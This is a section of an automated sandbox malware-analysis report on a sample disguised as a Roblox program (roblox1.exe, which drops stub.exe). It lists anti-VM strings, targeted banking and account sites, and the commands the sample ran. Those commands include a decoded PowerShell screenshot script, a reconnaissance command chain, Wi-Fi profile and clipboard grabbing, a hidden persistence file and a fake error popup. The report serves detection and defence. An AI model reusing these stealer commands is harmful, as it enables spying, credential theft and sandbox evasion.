                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940721109.00000213BE12E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvmwareuser.exe
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvmtoolsd.exeuvmwaretray.exeuvmacthlp.exeuvboxtray.exeuvboxservice.exeuvmsrvc.exeuprl_tools.exeuxenservice.exeuAntiVM.CheckProcessT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: aqemu
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: avirtualboxavmwareuAntiVM.CheckGpuadecoded_outputu<genexpr>uAntiVM.CheckGpu.<locals>.<genexpr>L
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: avmware
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll4
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: asandboxacuckooavmavirtualaqemuavboxaxenanodeuAntiVM.CheckHostNameT
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940721109.00000213BE12E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvmusrvc.exe
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: stub.exe, 00000003.00000002.1949761469.00000213BF5B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-VsizeEndCentDir
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uqemu-ga.exe
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvboxservice.exe
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvmtoolsd.exe
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvmsrvc.exe
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: cvmware
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvmwaretray.exe
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
                  Source: stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicheartbeat
                  Source: stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicvss
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicshutdown
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: cVMware
                  Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uvboxtray.exe
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: uwmic path Win32_ComputerSystem get ManufacturercVMwarecvmwareuAntiVM.CheckHypervisoraFakeErrorT
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
                  Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Encrypted powershell cmdline option found
                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded [Reflection.Assembly]::LoadWithPartialName("System.Drawing")function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose()}$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080)$path = (Get-Item .).FullName+"\screenshot.png"screenshot $bounds $path
                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded [Reflection.Assembly]::LoadWithPartialName("System.Drawing")function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose()}$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080)$path = (Get-Item .).FullName+"\screenshot.png"screenshot $bounds $path
                  Source: C:\Users\user\Desktop\roblox1.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe C:\Users\user\Desktop\roblox1.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ClipboardJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
